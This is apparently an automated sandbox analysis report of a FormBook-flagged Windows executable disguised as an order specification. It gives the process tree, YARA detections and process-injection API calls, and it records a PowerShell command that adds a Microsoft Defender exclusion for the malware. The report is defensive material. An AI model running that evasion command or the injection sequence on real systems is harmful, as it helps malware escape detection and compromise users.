                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0x470000
                                                    File size:995'840 bytes
                                                    MD5 hash:F07575DCCCAA8B88972464B50B63B017
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0x7d0000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0x1f0000
                                                    File size:995'840 bytes
                                                    MD5 hash:F07575DCCCAA8B88972464B50B63B017
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0xc20000
                                                    File size:995'840 bytes
                                                    MD5 hash:F07575DCCCAA8B88972464B50B63B017
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:11:50:41
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe"
                                                    Imagebase:0xae0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:11:50:43
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\SysWOW64\compact.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                    Imagebase:0x50000
                                                    File size:41'472 bytes
                                                    MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:14
                                                    Start time:11:50:56
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe"
                                                    Imagebase:0xae0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:15
                                                    Start time:11:51:08
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff728280000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:11.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:263
                                                      Total number of Limit Nodes:12
                                                      • Instruction Fuzzy Hash: 7131E831F19315CFEBD88BB499516BFB6B7EBC8600F10D426D952AB284CE30CD419B92
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3caf275742bc063763d87efc90d19c7bee7a637fc71b7aecbc3502974e4aeea
                                                      • Instruction ID: 1133163e316a4fb75c6a09e80968d327c87a8c3e4b27acd47ddfbbacc6172a4f
                                                      • Opcode Fuzzy Hash: a3caf275742bc063763d87efc90d19c7bee7a637fc71b7aecbc3502974e4aeea
                                                      • Instruction Fuzzy Hash: 4BA18E34B14204CFDB449B79D859B6E7AF3BF88700F25846AE906EB395DE71DD018B80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d09ebbfa309b87d12cd4c8f2f2a88835884d093ce7570075b316b82c3eca907
                                                      • Instruction ID: bce9271ed1b393fb155efad919cd7c06f3802bab079822dcc5047d57ec30e3f5
                                                      • Opcode Fuzzy Hash: 1d09ebbfa309b87d12cd4c8f2f2a88835884d093ce7570075b316b82c3eca907
                                                      • Instruction Fuzzy Hash: F4A13331208351CFD7A48F2ADC809AABBF2FF96314B56886AD4C2DB251C730DD15CB89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bf92d7cb63e94f9be7fde330edd00057d6bee520059d9ad3f5fadfd815ace1b
                                                      • Instruction ID: 9b78584bf8f782e81653d1e0c246725b8c15ec769ff79cd0c8308508f0508e6a
                                                      • Opcode Fuzzy Hash: 0bf92d7cb63e94f9be7fde330edd00057d6bee520059d9ad3f5fadfd815ace1b
                                                      • Instruction Fuzzy Hash: 0461DF31218255CFD784CF29CD8562A7BB2FB85300F42846BE846EF2A1D731ED55CB89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c3fb902e7d14e18e117c24075d14c8385257a66e6148c0d0cd12fa5e2d29e8c
                                                      • Instruction ID: 57a155efe254e98bb39752447c9648b16f3334b003e11c2c44d63ac39147af6b
                                                      • Opcode Fuzzy Hash: 8c3fb902e7d14e18e117c24075d14c8385257a66e6148c0d0cd12fa5e2d29e8c
                                                      • Instruction Fuzzy Hash: 80519E34B142049FDB589B74D859B6EBAF3BFC8700F258069E906EB395CE75DD418B40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c44e87be680986d63b886224c53d1d752dad82da8d647d15493f8eb7bd7e165
                                                      • Instruction ID: aa3858d9805bd5a2bef19b608c5ea447daedc58ffa7cee50c25b1c5d1293f7c0
                                                      • Opcode Fuzzy Hash: 3c44e87be680986d63b886224c53d1d752dad82da8d647d15493f8eb7bd7e165
                                                      • Instruction Fuzzy Hash: 8841A73AE0C219DFDB84CFA8C9404AEFBB6EF88210F10456AE555EB254D631CA418791
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0fc9145db2b9c5e352a448edc7f8ef49bffdcd2def31a8059a701615efe7133
                                                      • Instruction ID: 3351743740b42a7f58de6657354f123b8d2507bc9650a82d603cc3f091e04cc9
                                                      • Opcode Fuzzy Hash: e0fc9145db2b9c5e352a448edc7f8ef49bffdcd2def31a8059a701615efe7133
                                                      • Instruction Fuzzy Hash: B041A739B1C219DFDB84CFA8C9404AEFBB6EFC8310B60446AE959EB254D631DE418791

                                                      Control-flow Graph

                                                      APIs
                                                      • ResumeThread.KERNELBASE ref: 048814DA
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048815A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Thread$ContextResumeWow64
                                                      • String ID:
                                                      • API String ID: 1826235168-0

                                                      Control-flow Graph

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04881FC0
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048820A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcess$ReadWrite
                                                      • String ID:
                                                      • API String ID: 3589323503-0

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048823EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048823EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9AFFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04881AA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0

                                                      Control-flow Graph

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048820A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0

                                                      Control-flow Graph

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04881FC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0

                                                      Control-flow Graph

                                                      control_flow_graph 298 4881f2c-4881f7e 300 4881f8e-4881fcd WriteProcessMemory 298->300 301 4881f80-4881f8c 298->301 304 4881fcf-4881fd5 300->304 305 4881fd6-4882006 300->305 301->300 304->305
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04881FC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0

                                                      Control-flow Graph

                                                      control_flow_graph 309 b9b790-b9d714 DuplicateHandle 311 b9d71d-b9d73a 309->311 312 b9d716-b9d71c 309->312 312->311
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D646,?,?,?,?,?), ref: 00B9D707
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0

                                                      Control-flow Graph

                                                      control_flow_graph 315 4881528-4881573 317 4881583-48815b3 Wow64SetThreadContext 315->317 318 4881575-4881581 315->318 320 48815bc-48815ec 317->320 321 48815b5-48815bb 317->321 318->317 321->320
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048815A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0

                                                      Control-flow Graph

                                                      control_flow_graph 325 4882020-48820ad ReadProcessMemory 328 48820af-48820b5 325->328 329 48820b6-48820e6 325->329 328->329
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048820A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0

                                                      Control-flow Graph

                                                      control_flow_graph 333 b9d678-b9d714 DuplicateHandle 334 b9d71d-b9d73a 333->334 335 b9d716-b9d71c 333->335 335->334
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D646,?,?,?,?,?), ref: 00B9D707
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B9B079,00000800,00000000,00000000), ref: 00B9B28A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B9B079,00000800,00000000,00000000), ref: 00B9B28A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04881AA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9AFFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 04884F65
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 04884F65
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 697030a3643837403aea096bdae0af37c796f3535afbd7ee202709d110dd4dd7
                                                      • Instruction ID: 4c68771c2eb5f91d64abd79a98c18366548e815215e2b8de1622b21b1e3510c3
                                                      • Opcode Fuzzy Hash: 697030a3643837403aea096bdae0af37c796f3535afbd7ee202709d110dd4dd7
                                                      • Instruction Fuzzy Hash: 3C51B0B4909284CFC706CB69E554A58BFF0AF8A300B2A84C6D484DB2B3CB75AD55CB12
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 305a0ec6d05b7e6a13b9e7310c883a3e960835b244f3bba5a16c6a64bde7342d
                                                      • Instruction ID: c6258276b1c9c516eb1fa7ad7ca9735428eb3de3aa28dd6366fa6d105b54cf04
                                                      • Opcode Fuzzy Hash: 305a0ec6d05b7e6a13b9e7310c883a3e960835b244f3bba5a16c6a64bde7342d
                                                      • Instruction Fuzzy Hash: 9741F575E08208CFDB44CB99D484AEDBBF5FB89300F1495AAD919A7251C731AE42CFA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ffec1ff0a22634f982610fe099b8f1f66f9f771611bb2e62105766cbcaf6708f
                                                      • Instruction ID: 5e61ba349a85fa6721fe3376dd84d0ced391ca3333ac2d431a2e681e8f8ce9ea
                                                      • Opcode Fuzzy Hash: ffec1ff0a22634f982610fe099b8f1f66f9f771611bb2e62105766cbcaf6708f
                                                      • Instruction Fuzzy Hash: 3B412974D082088FEB44CFAAD4856AEFBF6BF8C300F14D22AD459A7255DB348942CB94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
